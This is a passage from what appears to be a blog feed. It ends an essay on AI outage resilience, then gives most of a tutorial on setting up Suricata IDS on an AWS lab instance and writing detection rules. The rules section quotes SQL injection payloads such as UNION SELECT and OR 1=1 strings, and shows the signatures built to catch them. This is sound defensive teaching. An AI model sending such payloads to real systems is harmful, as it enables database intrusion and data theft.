demonstrate. The question shifts from "will we finish?" to "how much will we finish?" — which is a fundamentally less terrifying question to answer to a stakeholder.</p> <p>That psychological shift matters more than people acknowledge. A team that can say "five of seven modules are complete and working" at deadline is in a completely different conversation than a team with a 90%-complete monolith that does not run yet. The first team has leverage. The second team has an apology.</p> <h3> Why Option 3 Is Just Good Engineering — With Higher Stakes </h3> <p>This is not a new idea. Modular, incremental delivery is what good engineers have always done: ship working increments, commit frequently, never let the uncommitted work exceed what you could reconstruct from memory if the power went out.</p> <p>What AI changes is that the <strong>cost of ignoring this discipline is now much higher</strong>.</p> <p>When humans wrote everything, a monolithic three-hour session was recoverable. The engineer who wrote it held the full mental model. When an AI writes 800 lines across a three-hour session that the human was loosely supervising, no human holds that model in full. An outage does not just cut throughput. It reveals that the understanding was shallower than anyone admitted.</p> <p>Option 3 forces understanding to be built incrementally as a side effect of shipping incrementally. Each module that gets committed and reviewed is a module that at least one human genuinely understands. The AI outage hits a team in that state differently — not "we are stranded" but "we are paused on the next module, everything before it is solid."</p> <h3> How This Refines the LLM Dependency Test </h3> <p>This analysis sharpens what the LLM Dependency Test is actually measuring — and suggests a natural extension.</p> <p>The test should evaluate not just whether the candidate can continue after the cutoff, but <strong>how much of their work is in a shippable state at the moment the AI goes down</strong>.</p> <p>A candidate who has been committing working modules incrementally throughout the AI-assisted phase walks into the cutoff with a safety net. Something real exists. The remaining work is bounded and visible.</p> <p>A candidate who has been building toward a big-bang completion has nothing shippable and faces the throughput problem and the understanding problem simultaneously.</p> <p>The behavior before the cutoff is as revealing as the behavior after it. A candidate who naturally structures work into independently deployable increments — without being asked, without knowing the cutoff is coming — has architecture instincts that survive an outage. A candidate who builds monolithically toward a single finish line does not.</p> <p>That is the engineer worth hiring. Not because they are immune to the outage. But because when it happens, they have already protected the project.</p> <h3> The Most Secure Option </h3> <p><a href="https://dev.to/fosres/let-humans-write-let-ai-critique-a-manifesto-for-security-engineers-jg8">Let humans design and write code. Let AI critique.</a></p> <p><em>Updated March 22, 2026 — with discussion of the throughput problem and the case for modular milestone architecture.</em></p> <p><strong>Discussion prompts:</strong></p> <ul> <li>Have you experienced an AI outage mid-project? What happened?</li> <li>Would you pass the LLM Dependency Test today?</li> <li>Should this become a standard part of engineering interviews?</li> <li>Does your team plan projects assuming AI availability? What would Option 3 look like in your workflow?</li> </ul> ai career interview llm fosres Sat, 21 Mar 2026 20:03:22 +0000 https://dev.to/fosres/use-suricata-as-an-intrusion-detection-system-on-aws-3582 https://dev.to/fosres/use-suricata-as-an-intrusion-detection-system-on-aws-3582 <blockquote> <p><strong>This is Part 3 of a series. I highly recommend reading the first two posts in order before starting this one:</strong></p> <p><strong>1️⃣ <a href="https://dev.to/fosres/secure-aws-lab-setup-for-security-engineers-iam-identity-center-ssm-zero-open-ports-1hfn">Secure AWS Lab Setup for Security Engineers: IAM Identity Center + SSM + Zero Open Ports</a></strong><br> Learn how to set up AWS IAM Identity Center, SSM Session Manager, and a zero-open-ports EC2 instance. This post assumes you have completed this setup.</p> <p><strong>2️⃣ <a href="https://dev.to/fosres/fish-shell-functions-for-managing-aws-ec2-instances-save-progress-time-and-billing-1kbi">Fish Shell Functions for Managing AWS EC2 Instances — Save Time and Billing</a></strong><br> Learn how to use fish shell functions (<code>lab-create</code>, <code>lab-connect</code>, <code>lab-snapshot</code>, <code>lab-restore</code>, etc.) to manage your EC2 lab efficiently. The commands in this post assume you have these functions installed.</p> <p>⚠️ <strong>Your instance IP changes every session.</strong> Every time you run <code>lab-restore</code> or <code>lab-create</code> a new EC2 instance is launched with a different private IP address. Before running any commands in this post that reference an IP address (curl tests, nmap, suricata.yaml <code>HOME_NET</code>), always check your current IP first:</p> <pre class="highlight shell"><code>ip addr show enX0 | <span class="nb">grep</span> <span class="s2">"inet "</span> </code></pre> <p>Replace <code>172.31.23.15</code> throughout this post with whatever IP your instance currently has.</p> </blockquote> <p>All the fish shell functions used in this series for managing EC2 instances — <code>lab-create</code>, <code>lab-connect</code>, <code>lab-status</code>, <code>lab-start</code>, <code>lab-stop</code>, <code>lab-terminate</code>, <code>lab-login</code>, <code>lab-snapshot</code>, <code>lab-snapshot-list</code>, <code>lab-snapshot-delete</code>, and <code>lab-restore</code> — are available to download from GitHub:</p> <p><strong>👉 <a href="https://github.com/fosres/SecEng-Exercises/tree/main/aws/functions" rel="noopener noreferrer">github.com/fosres/SecEng-Exercises/tree/main/aws/functions</a></strong></p> <p>Download them, place each file in <code>~/.config/fish/functions/</code>, and they are immediately available in your terminal — no <code>source</code> command needed.</p> <p>If you find this useful, I'd really appreciate a ⭐ on my open source secure coding exercise repo — it helps a lot:</p> <p><strong>👉 <a href="https://github.com/fosres/SecEng-Exercises" rel="noopener noreferrer">github.com/fosres/SecEng-Exercises</a></strong></p> <p>Also — why do you read security engineering blog posts? One click helps me write better content:</p> <p><strong>👉 <a href="https://strawpoll.com/wby5QoKAkyA" rel="noopener noreferrer">Take the poll</a></strong> (takes 10 seconds)</p> <h2> What This Post Covers </h2> <p>This is an <strong>introduction to Suricata IDS</strong> for Security Engineers working in web application and cloud security. It covers what a mid-level Security Engineering interview expects you to know about network intrusion detection — no more, no less.</p> <p><strong>What you will learn:</strong></p> <ul> <li>Installing and configuring Suricata on a Debian EC2 instance</li> <li>Writing 5 custom detection rules from scratch covering SQL injection, port scanning, C2 beaconing, and DNS tunneling</li> <li>Iterative rule tuning — every rule in this post went through multiple revisions, and the revision history is documented honestly</li> <li>Identifying and resolving false positives using <code>pass</code> rules — specifically the AWS IMDS and SSM Agent traffic that looks identical to C2 beaconing</li> <li>Capturing and analyzing traffic with <code>tcpdump</code> to correlate PCAP evidence with Suricata alerts</li> <li>Connecting local Suricata rules directly to AWS Network Firewall — the same rule syntax runs in both environments</li> <li>5 practice exercises covering rule interpretation, threshold tuning, rule management, keyword identification, and community rulesets</li> </ul> <p><strong>What this post deliberately omits:</strong></p> <ul> <li> <strong>TLS inspection</strong> — Suricata can inspect encrypted HTTPS traffic if configured with TLS decryption, but that requires certificate management and is a topic on its own</li> <li> <strong>Inline IPS mode</strong> — this post runs Suricata in IDS mode (alert only). Switching to IPS mode (drop packets) requires routing traffic through Suricata rather than just mirroring it — a different architecture</li> <li> <strong>SIEM integration</strong> — shipping Suricata <code>eve.json</code> alerts to ELK or Splunk for correlation and dashboarding is covered separately in the Week 8 ELK post</li> <li> <strong>Zeek for network metadata</strong> — Zeek complements Suricata by generating rich connection metadata rather than signature-based alerts. The two tools are used together in production but are separate topics</li> <li> <strong>Performance tuning</strong> — multi-threading, AF_PACKET tuning, and rule optimization for high-throughput environments are senior-level topics that belong in a dedicated post</li> <li> <strong>Full AWS Network Firewall deployment</strong> — creating the rule group is covered here, but attaching it to a firewall policy, deploying a firewall endpoint, and updating VPC route tables requires a properly architected VPC covered in Week 50</li> </ul> <p>This post is Part 3 of a series. The natural continuation points are Week 50 (deploying Network Firewall in a production VPC architecture) and Week 87 (production-grade network monitoring with Suricata + Zeek + Security Onion).</p> <h2> Part 1: Connect to the Lab Instance </h2> <p>From your local machine:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>lab-login # tap YubiKey if SSO token has expired lab-status # confirm: running lab-connect # shell as ssm-user </code></pre> </div> <p>Once inside the instance:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="nb">sudo</span> <span class="nt">-i</span> </code></pre> </div> <h2> Part 2: Saving Your Progress — Snapshots </h2> <p>Before going any further, make sure you have the snapshot fish functions set up on your local machine. Setting up Suricata takes time and you will likely spread the work across multiple sessions. The snapshot functions let you save your instance state, terminate it to pay nothing overnight, and restore exactly where you left off next session.</p> <p>Full implementations and explanations are in the dedicated post:</p> <p><strong>👉 <a href="https://dev.to/fosres/fish-shell-functions-for-managing-aws-ec2-instances-save-progress-time-and-billing-1kbi">Week 9: Fish Shell Functions for Managing AWS EC2 Instances -- Save Time and Billing</a></strong></p> <p>The four snapshot commands you will use throughout this post:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>lab-snapshot-list # see all your saved snapshots lab-snapshot # save current instance state — prompts for instance ID and name lab-restore # launch a new instance from a saved snapshot lab-snapshot-delete # delete old snapshots to stop storage charges </code></pre> </div> <blockquote> <p>⏳ <strong><code>lab-snapshot</code> takes 3-5 minutes to complete.</strong> AWS copies the entire EBS volume to S3 in the background. Do not interrupt it. A heavily loaded instance may take up to 10-15 minutes.</p> </blockquote> <p><strong>You do not need to remember the AMI ID.</strong> When you run <code>lab-restore</code> it prints a table of all your saved snapshots by name:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>Your saved AMIs: +------------------------+---------------------------+----------------------+ | ami-0xxxxxxxxxxxxxxxxx | suricata_setup-2026-03-15 | 2026-03-15T12:00:00Z | +------------------------+---------------------------+----------------------+ </code></pre> </div> <h3> Complete Zero-Cost Session Workflow </h3> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>lab-login # tap YubiKey → 8hr credentials lab-restore # launch from snapshot → wait → "Ready" lab-connect # shell as ssm-user, Suricata already installed lab-snapshot # save progress before ending session lab-terminate # zero ongoing cost </code></pre> </div> <h2> Part 3: Install Suricata on Debian 13 </h2> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>apt-get update <span class="nt">-y</span> <span class="o">&amp;&amp;</span> apt-get upgrade <span class="nt">-y</span> apt-get <span class="nb">install </span>suricata suricata-update <span class="nt">-y</span> </code></pre> </div> <p>Verify the installation:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>suricata <span class="nt">--build-info</span> systemctl status suricata ip addr </code></pre> </div> <blockquote> <p><strong>Note the interface name</strong> from <code>ip addr</code> — Debian on EC2 typically uses <code>ens5</code> or <code>eth0</code>. You will need it when configuring <code>suricata.yaml</code>.</p> </blockquote> <p>Update the default ruleset:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>suricata-update systemctl start suricata systemctl <span class="nb">enable </span>suricata systemctl status suricata </code></pre> </div> <h2> Part 4: Configure suricata.yaml </h2> <p>Two values need to be set correctly before Suricata can capture traffic: the network interface and the <code>HOME_NET</code> variable. Both come from the <code>ip addr</code> output.</p> <h3> Identifying the Correct Interface </h3> <p>Run <code>ip addr</code> and look for the interface that has:</p> <ul> <li> <code>&lt;BROADCAST,MULTICAST,UP,LOWER_UP&gt;</code> — confirms it is up and capable of capturing traffic</li> <li> <code>state UP</code> — confirms it is active</li> <li>An <code>inet</code> address in the <code>172.x.x.x</code> or <code>10.x.x.x</code> range — confirms it is the EC2 network interface, not loopback</li> </ul> <p>For example on my Debian 13 EC2 instance my correct interface looks like:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight console"><code><span class="gp">2: enX0: &lt;BROADCAST,MULTICAST,UP,LOWER_UP&gt;</span><span class="w"> </span>mtu 9001 qdisc fq_codel state UP group default qlen 1000 <span class="go"> link/ether 0a:ff:cd:e5:67:a9 brd ff:ff:ff:ff:ff:ff inet 172.31.25.81/20 metric 100 brd 172.31.31.255 scope global dynamic enX0 </span></code></pre> </div> <p>Ignore <code>lo</code> — that is the loopback interface (<code>127.0.0.1</code>) and has no external traffic.</p> <p>The interface name on Debian 13 EC2 instances is <code>enX0</code> rather than the more common <code>eth0</code> or <code>ens5</code> you may see in other tutorials. Always confirm with <code>ip addr</code> before editing <code>suricata.yaml</code> — using the wrong interface name means Suricata starts successfully but captures nothing.</p> <p>From <code>ip addr</code> on this instance:</p> <ul> <li> <strong>Interface:</strong> <code>enX0</code> </li> <li> <strong>Subnet:</strong> <code>172.31.16.0/20</code> (the <code>/20</code> subnet containing <code>172.31.25.81</code>)</li> </ul> <blockquote> <p><strong>Note:</strong> Your interface name and subnet will be the same if you are following along on the same EC2 instance type and region. If they differ, substitute your own values in the steps below.</p> </blockquote> <h3> Set HOME_NET </h3> <p>Open <code>suricata.yaml</code>:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>nano /etc/suricata/suricata.yaml </code></pre> </div> <p>Find the <code>HOME_NET</code> line (near the top, under <code>vars:</code>) and update it to match your subnet:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight yaml"><code><span class="na">vars</span><span class="pi">:</span> <span class="na">address-groups</span><span class="pi">:</span> <span class="na">HOME_NET</span><span class="pi">:</span> <span class="s2">"</span><span class="s">[172.31.16.0/20]"</span> </code></pre> </div> <p>The default value is <code>[192.168.0.0/16,10.0.0.0/8,172.16.0.0/12]</code> which technically includes the EC2 subnet — but setting it explicitly to your actual subnet makes your custom rules more precise and reduces false positives.</p> <p>From the <code>ip addr</code> output, the relevant line is:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>inet 172.31.25.81/20 ... scope global dynamic enX0 </code></pre> </div> <p><code>172.31.25.81</code> is the <strong>host address</strong> — the IP of this specific instance. The <code>/20</code> is the subnet mask. The actual subnet to use in <code>HOME_NET</code> is <code>172.31.16.0/20</code>, not <code>172.31.25.81/20</code>. A <code>/20</code> mask starting at <code>172.31.16.0</code> covers the range <code>172.31.16.0</code> → <code>172.31.31.255</code>, and <code>172.31.25.81</code> falls within that range — which is how you know <code>172.31.16.0/20</code> is the correct value.</p> <p>If you are unsure of your subnet's network address, run:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>ip route | <span class="nb">grep </span>enX0 </code></pre> </div> <p>The line starting with <code>172.31.x.x/20</code> (without a <code>src</code> qualifier) is your subnet.</p> <h3> Set the Capture Interface </h3> <p>In the same file, find the <code>af-packet</code> section and set the interface to <code>enX0</code>:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight yaml"><code><span class="na">af-packet</span><span class="pi">:</span> <span class="pi">-</span> <span class="na">interface</span><span class="pi">:</span> <span class="s">enX0</span> <span class="pi">-</span> <span class="na">interface</span><span class="pi">:</span> <span class="s">lo</span> </code></pre> </div> <p>Search for it quickly with <code>Ctrl+W</code> then type <code>af-packet</code> in nano.</p> <blockquote> <p><strong>Why add <code>lo</code>?</strong> When testing Suricata from the same instance (e.g. running <code>curl</code> against the instance's own IP), Linux routes the traffic internally through the loopback interface <code>lo</code> rather than through <code>enX0</code> — even if you use the real IP address <code>172.31.23.15</code>. This is called <strong>local routing</strong> and means Suricata sees none of that traffic if it only monitors <code>enX0</code>. Adding <code>lo</code> to the <code>af-packet</code> list lets Suricata inspect self-generated test traffic without needing to open any inbound ports or send traffic from an external machine.</p> </blockquote> <h3> Enable the Custom Rules File </h3> <p>Still in <code>suricata.yaml</code>, find the <code>rule-files:</code> section and add the custom rules file:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight yaml"><code><span class="na">rule-files</span><span class="pi">:</span> <span class="pi">-</span> <span class="s">suricata.rules</span> <span class="pi">-</span> <span class="s">/etc/suricata/rules/custom.rules</span> </code></pre> </div> <p>Save and exit: <code>Ctrl+X</code> → <code>Y</code> → <code>Enter</code></p> <h3> Create the Custom Rules File </h3> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="nb">mkdir</span> <span class="nt">-p</span> /etc/suricata/rules <span class="nb">touch</span> /etc/suricata/rules/custom.rules </code></pre> </div> <h3> Validate and Restart </h3> <p>Before running the config test, update the default ruleset to ensure <code>suricata.rules</code> exists at the expected path:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>suricata-update </code></pre> </div> <p>Then run the config test:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>suricata <span class="nt">-T</span> <span class="nt">-c</span> /etc/suricata/suricata.yaml <span class="nt">-v</span> </code></pre> </div> <p><code>-T</code> runs a config test without starting capture. Look for:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>Notice: suricata: Configuration provided was successfully loaded. Exiting. </code></pre> </div> <p>If the test passes, restart the service:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>systemctl restart suricata systemctl status suricata </code></pre> </div> <p>Confirm Suricata is capturing on <code>enX0</code>:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="nb">tail</span> <span class="nt">-f</span> /var/log/suricata/suricata.log | <span class="nb">grep </span>enX0 </code></pre> </div> <p>You should see a line like:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>Info: iface-conf: Configuring af-packet for enX0 </code></pre> </div> <h2> Part 5: Write 5 Custom Detection Rules </h2> <p>Rules file: <code>/etc/suricata/rules/custom.rules</code></p> <p>Before writing the rules it is worth understanding what Suricata can and cannot detect at the network level — especially for SQL injection.</p> <h3> How Suricata Detects Attacks </h3> <p>Suricata is a <strong>signature-based IDS</strong>. It inspects network packets looking for known patterns — strings, regular expressions, protocol anomalies. When a packet matches a rule it generates an alert in <code>fast.log</code> and a detailed JSON event in <code>eve.json</code>.</p> <p>This makes it very good at catching <strong>known, unsophisticated attacks</strong> — automated scanners, script kiddies running off-the-shelf tools, and anyone sending payloads in plain text over HTTP. It is less effective against a skilled attacker doing manual exploitation, for reasons covered below.</p> <h3> SQL Injection Rules — How Effective Are They? </h3> <p><strong>Rule 1 — UNION SELECT</strong> catches classic UNION-based payloads like:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight sql"><code><span class="s1">' UNION SELECT username, password FROM users-- </span></code></pre> </div> <p>It uses <code>content</code> matching with <code>nocase</code> so case variation is handled. It <strong>fails against</strong>:</p> <ul> <li>URL encoding: <code>%55%4E%49%4F%4E</code> instead of <code>UNION</code> </li> <li>Comment injection: <code>UN/**/ION SE/**/LECT</code> </li> <li>HTTPS traffic — Suricata cannot inspect encrypted payloads without TLS inspection configured</li> </ul> <p><strong>Rule 2 — Comment Bypass</strong> uses <strong>PCRE</strong> (Perl Compatible Regular Expressions) to catch <code>' OR 1=1</code> style payloads and their URL-encoded variants (<code>%27</code>, <code>%3D</code>). PCRE is a powerful pattern matching syntax that goes beyond simple string matching — instead of looking for a fixed string like <code>UNION SELECT</code>, a PCRE pattern can match variable structures. In this case the pattern matches a single quote (or its URL-encoded form <code>%27</code>) followed by <code>OR</code>/<code>AND</code> followed by an equals sign, in any combination of whitespace and case.</p> <blockquote> <p><strong>Does Suricata use Perl?</strong> No — PCRE is just a C library that implements the regex syntax Perl popularized in the 1980s-90s. The name is historical. Suricata is written in C and links against the PCRE library directly — Perl itself is nowhere in the picture. The same library is used by Apache, nginx, PHP, and grep, which is why PCRE has become the de facto standard for regex across the industry.</p> </blockquote> <p>It <strong>misses</strong> attacks destined for this server:</p> <ul> <li>Time-based blind SQLi: <code>'; WAITFOR DELAY '0:0:5'--</code> </li> <li>Boolean-based blind SQLi that does not use <code>OR</code>/<code>AND</code> </li> <li>Second-order SQLi where the payload is stored and executed later</li> <li>Out-of-band SQLi using DNS or HTTP exfiltration channels</li> </ul> <p><strong>The honest reality:</strong> Suricata's SQLi rules are a last line of defense, not a primary control. They are useful for catching automated scanners and known payloads in plaintext traffic. A skilled attacker doing manual exploitation will evade them.</p> <p>The real defenses against SQL injection are at the application layer — parameterized queries, ORMs, and input validation. Suricata gives you <strong>visibility and alerting</strong>, not prevention. That distinction matters and is worth knowing for Security Engineering interviews.</p> <h3> The 5 Rules </h3> <h3> Rule 1: SQL Injection — UNION SELECT </h3> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>alert tcp any any -&gt; <span class="nv">$HOME_NET</span> 80 <span class="o">(</span>msg:<span class="s2">"SQL Injection UNION SELECT Attempt"</span><span class="p">;</span> content:<span class="s2">"UNION"</span><span class="p">;</span> nocase<span class="p">;</span> content:<span class="s2">"SELECT"</span><span class="p">;</span> nocase<span class="p">;</span> sid:9000001<span class="p">;</span> rev:4<span class="p">;</span><span class="o">)</span> </code></pre> </div> <p><strong>How it works:</strong></p> <ul> <li> <strong><code>alert</code></strong> — the action to take when the rule matches. <code>alert</code> generates a log entry in <code>fast.log</code> and <code>eve.json</code> but does not block the traffic. Other actions include <code>drop</code> (block the packet) and <code>pass</code> (allow and stop processing further rules).</li> <li> <strong><code>tcp</code></strong> — the protocol to inspect. Using <code>tcp</code> instead of <code>http</code> means Suricata inspects the raw TCP stream directly — no protocol normalization needed. This ensures the rule fires on the raw packet bytes regardless of HTTP layer parsing.</li> <li> <strong><code>any any</code></strong> (source) — match traffic coming from any IP address on any port.</li> <li> <strong><code>-&gt;</code></strong> — traffic direction. This arrow means the rule only inspects traffic flowing from source to destination, not the reverse.</li> <li> <strong><code>$HOME_NET 80</code></strong> (destination) — match traffic destined for port 80 (HTTP) on any host within <code>$HOME_NET</code>. Restricting to port 80 keeps the rule focused on web traffic specifically.</li> <li> <strong><code>msg:"SQL Injection UNION SELECT Attempt"</code></strong> — the human-readable label that appears in the alert log so you know what triggered.</li> <li> <strong><code>content:"UNION"</code></strong> — simple substring search for the exact string <code>UNION</code> anywhere in the TCP payload.</li> <li> <strong><code>nocase</code></strong> — makes the preceding <code>content</code> match case-insensitive so <code>union</code>, <code>UNION</code>, and <code>Union</code> all trigger it.</li> <li> <strong><code>content:"SELECT"</code></strong> — look for the string <code>SELECT</code> in the packet payload after <code>UNION</code> has already matched.</li> <li> <strong><code>sid:9000001</code></strong> — the unique rule ID (Signature ID). The <code>9000000</code> range is reserved for local/custom rules so it does not conflict with official Emerging Threats or Snort rulesets.</li> <li> <strong><code>rev:4</code></strong> — the revision number of this rule. This reached revision 4 through iterative tuning during lab setup — a realistic example of how rules evolve in practice.</li> </ul> <p><strong>Example payload it catches:</strong><br> </p> <div class="highlight js-code-highlight"> <pre class="highlight sql"><code><span class="s1">' UNION SELECT username, password FROM users-- </span></code></pre> </div> <p><strong>Fails against:</strong></p> <ul> <li> <strong>URL encoding:</strong> <code>%55%4E%49%4F%4E</code> instead of <code>UNION</code> — Suricata sees encoded bytes, not the decoded string</li> <li> <strong>Comment injection:</strong> <code>UN/**/ION SE/**/LECT</code> — the SQL comment breaks up the string so neither <code>UNION</code> nor <code>SELECT</code> appears as a complete match</li> <li> <strong>HTTPS traffic</strong> — Suricata cannot inspect encrypted payloads without TLS inspection configured, so any SQLi over HTTPS is completely invisible to this rule</li> </ul> <h3> Rule 2: SQL Injection — Comment Bypass </h3> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>alert tcp any any -&gt; <span class="nv">$HOME_NET</span> 80 <span class="o">(</span>msg:<span class="s2">"SQL Injection Comment Bypass Attempt"</span><span class="p">;</span> content:<span class="s2">"OR"</span><span class="p">;</span> nocase<span class="p">;</span> content:<span class="s2">"="</span><span class="p">;</span> nocase<span class="p">;</span> sid:9000002<span class="p">;</span> rev:6<span class="p">;</span><span class="o">)</span> </code></pre> </div> <p><strong>How it works:</strong></p> <ul> <li> <strong><code>alert</code></strong> — generate an alert without blocking.</li> <li> <strong><code>tcp</code></strong> — inspect raw TCP stream directly. The <code>http</code> protocol keyword caused matching issues with URL-encoded payloads on this setup — switching to <code>tcp</code> resolved it.</li> <li> <strong><code>any any</code></strong> (source) — match traffic from any IP on any port.</li> <li> <strong><code>-&gt;</code></strong> — traffic direction toward the server.</li> <li> <strong><code>$HOME_NET 80</code></strong> — match traffic destined for port 80 on hosts in your subnet.</li> <li> <strong><code>msg:"SQL Injection Comment Bypass Attempt"</code></strong> — the alert label.</li> <li> <strong><code>content:"OR"</code></strong> — match the literal string <code>OR</code> anywhere in the TCP payload.</li> <li> <strong><code>nocase</code></strong> — case-insensitive so <code>or</code>, <code>OR</code>, and <code>Or</code> all trigger.</li> <li> <strong><code>content:"="</code></strong> — also require an equals sign somewhere in the payload. Requiring both <code>OR</code> and <code>=</code> reduces false positives compared to matching <code>OR</code> alone.</li> <li> <strong><code>sid:9000002</code></strong> — unique rule ID in the local custom range.</li> <li> <strong><code>rev:6</code></strong> — this rule went through 6 revisions during lab setup, starting as a PCRE pattern and ending as a reliable dual content match — a realistic example of iterative rule tuning.</li> </ul> <p><strong>Example payloads it catches:</strong><br> </p> <div class="highlight js-code-highlight"> <pre class="highlight sql"><code><span class="s1">' OR 1=1-- %27 OR 1%3D1-- '</span> <span class="k">AND</span> <span class="mi">1</span><span class="o">=</span><span class="mi">1</span><span class="c1">--</span> </code></pre> </div> <p><strong>Fails against:</strong></p> <ul> <li> <strong>Time-based blind SQLi:</strong> <code>'; WAITFOR DELAY '0:0:5'--</code> — no <code>OR</code>/<code>AND</code> equals pattern to match</li> <li> <strong>Boolean-based blind SQLi</strong> that does not use <code>OR</code>/<code>AND</code> </li> <li> <strong>Second-order SQLi</strong> — payload is stored in the database and executed later, never appearing in a direct HTTP request</li> <li> <strong>Out-of-band SQLi</strong> using DNS or HTTP exfiltration channels</li> </ul> <h3> A Note on PCRE in Suricata Rules </h3> <p>Rule 2 originally used a PCRE pattern instead of simple <code>content</code> matching. PCRE (Perl Compatible Regular Expressions) is a more powerful matching approach that can detect variable structures rather than fixed strings.</p> <p>The Suricata keyword is <code>pcre</code> and the syntax is:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>pcre:<span class="s2">"/pattern/flags"</span><span class="p">;</span> </code></pre> </div> <p>The original Rule 2 PCRE pattern was:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>alert http any any -&gt; <span class="nv">$HOME_NET</span> any <span class="o">(</span>msg:<span class="s2">"SQL Injection Comment Bypass Attempt"</span><span class="p">;</span> pcre:<span class="s2">"/(</span><span class="se">\%</span><span class="s2">27|</span><span class="se">\'</span><span class="s2">)</span><span class="se">\s</span><span class="s2">*(or|and)</span><span class="se">\s</span><span class="s2">*[</span><span class="se">\w\s</span><span class="s2">]*(</span><span class="se">\%</span><span class="s2">3D|=)/i"</span><span class="p">;</span> sid:9000002<span class="p">;</span> rev:1<span class="p">;</span><span class="o">)</span> </code></pre> </div> <p>Breaking down the pattern <code>/(\%27|\')\s*(or|and)\s*[\w\s]*(\%3D|=)/i</code>:</p> <div class="table-wrapper-paragraph"><table> <thead> <tr> <th>Pattern piece</th> <th>What it matches</th> </tr> </thead> <tbody> <tr> <td>`(\%27</td> <td>\')`</td> </tr> <tr> <td><code>\s*</code></td> <td>Zero or more whitespace characters</td> </tr> <tr> <td>`(or\</td> <td>and)`</td> </tr> <tr> <td><code>\s*</code></td> <td>Zero or more whitespace characters</td> </tr> <tr> <td><code>[\w\s]*</code></td> <td>Any word characters or spaces (e.g. <code>1</code>)</td> </tr> <tr> <td>`(\%3D\</td> <td>=)`</td> </tr> <tr> <td> <code>/i</code> flag</td> <td>Makes the entire pattern case-insensitive</td> </tr> </tbody> </table></div> <p><strong>Why PCRE was abandoned in this lab:</strong> The pattern failed to fire on URL-encoded payloads sent via curl. The <code>+</code> character used by <code>--data-urlencode</code> to represent spaces broke the <code>\s*</code> whitespace match since <code>+</code> is not a whitespace character. Rather than debug the PCRE pattern further, Rule 2 was simplified to dual <code>content</code> matching which is more reliable on raw TCP traffic.</p> <p><strong>When to use PCRE over content matching:</strong></p> <ul> <li>When the payload has variable structure — different whitespace, optional characters, or alternating patterns</li> <li>When you need to match URL-encoded and literal versions of the same character in one rule</li> <li>When <code>distance:0</code> is too strict — PCRE lets you express "these two strings with anything between them" more precisely</li> </ul> <p><strong>The tradeoff:</strong> PCRE is significantly more expensive to evaluate than <code>content</code> matching — Suricata has to run a regex engine against every matching packet. In high-traffic production environments this matters. Always benchmark PCRE rules under load before deploying them.</p> <h3> Rule 3: Port Scan — SYN Threshold </h3> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>alert tcp any any -&gt; <span class="nv">$HOME_NET</span> any <span class="o">(</span>msg:<span class="s2">"Possible Port Scan Detected"</span><span class="p">;</span> flags:S<span class="p">;</span> threshold:type threshold,track by_src,count 5,seconds 10<span class="p">;</span> sid:9000003<span class="p">;</span> rev:3<span class="p">;</span><span class="o">)</span> </code></pre> </div> <p><strong>How it works:</strong></p> <ul> <li> <strong><code>alert</code></strong> — generate an alert without blocking.</li> <li> <strong><code>tcp</code></strong> — inspect TCP traffic only. Port scans use TCP SYN packets to probe open ports.</li> <li> <strong><code>any any</code></strong> (source) — match traffic from any IP on any port.</li> <li> <strong><code>-&gt;</code></strong> — traffic flowing from source toward the destination.</li> <li> <strong><code>$HOME_NET any</code></strong> (destination) — any port on any host in your subnet. Port scanners probe many ports so leaving the destination port as <code>any</code> is correct.</li> <li> <strong><code>msg:"Possible Port Scan Detected"</code></strong> — the alert label.</li> <li> <strong><code>flags:S</code></strong> — only match packets with the SYN flag set and no other flags. A TCP SYN packet is the first step of a connection attempt. A port scanner sends many SYN packets to different ports to discover which ones are open — this is called a SYN scan or half-open scan.</li> <li> <strong><code>threshold:type threshold,track by_src,count 5,seconds 10</code></strong> — only alert once the same source IP has sent 5 or more SYN packets within a 10-second window. The original threshold was 20 but was lowered to 5 to ensure reliable detection on a single-core t2.micro where Suricata may not track all packets if nmap fires too fast. In a production environment with higher traffic volumes you would raise this to reduce false positives from legitimate services doing rapid connection attempts.</li> </ul> <p>The <code>threshold</code> keyword has four components worth understanding individually:</p> <div class="table-wrapper-paragraph"><table> <thead> <tr> <th>Component</th> <th>Value in this rule</th> <th>What it means</th> </tr> </thead> <tbody> <tr> <td><code>type</code></td> <td><code>threshold</code></td> <td>Alert once every time the count is reached. Other types: <code>limit</code> (alert only N times per window), <code>both</code> (alert once then suppress until window resets)</td> </tr> <tr> <td><code>track</code></td> <td><code>by_src</code></td> <td>Count packets per source IP separately. <code>by_dst</code> would count per destination IP instead. <code>by_rule</code> counts globally across all IPs</td> </tr> <tr> <td><code>count</code></td> <td><code>5</code></td> <td>How many matching packets must be seen before the rule fires</td> </tr> <tr> <td><code>seconds</code></td> <td><code>10</code></td> <td>The time window in which <code>count</code> packets must be observed</td> </tr> </tbody> </table></div> <p><strong><code>type threshold</code> vs <code>type both</code>:</strong> Rule 3 uses <code>type threshold</code> which 